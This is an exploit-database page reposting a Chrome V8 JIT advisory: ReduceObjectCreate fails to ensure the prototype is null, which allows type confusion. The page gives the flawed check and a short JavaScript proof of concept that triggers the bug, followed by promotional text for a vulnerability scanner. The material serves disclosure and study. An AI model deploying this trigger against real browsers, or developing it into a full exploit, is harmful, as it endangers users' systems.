chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null"

▸▸▸ Exploit & Vulnerability >>   dos exploit & multiple vulnerability




chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null" Code Code...
				
/* I think this commit has introduced the bug. https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2 According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null". The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion. if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) { return NoChange(); } instance_map = Map::GetObjectCreateMap(prototype_const); PoC: */ var object; function opt() { opt['x'] = 1.1; try { Object.create(object); } catch (e) { } for (let i = 0; i < 1000000; i++) { } } opt(); object = opt; opt();

Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null" Vulnerability / Exploit Source : Chrome v8 jit jsbuiltinreducer::reduceobjectcreate fails to ensure that the prototype is "null"



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.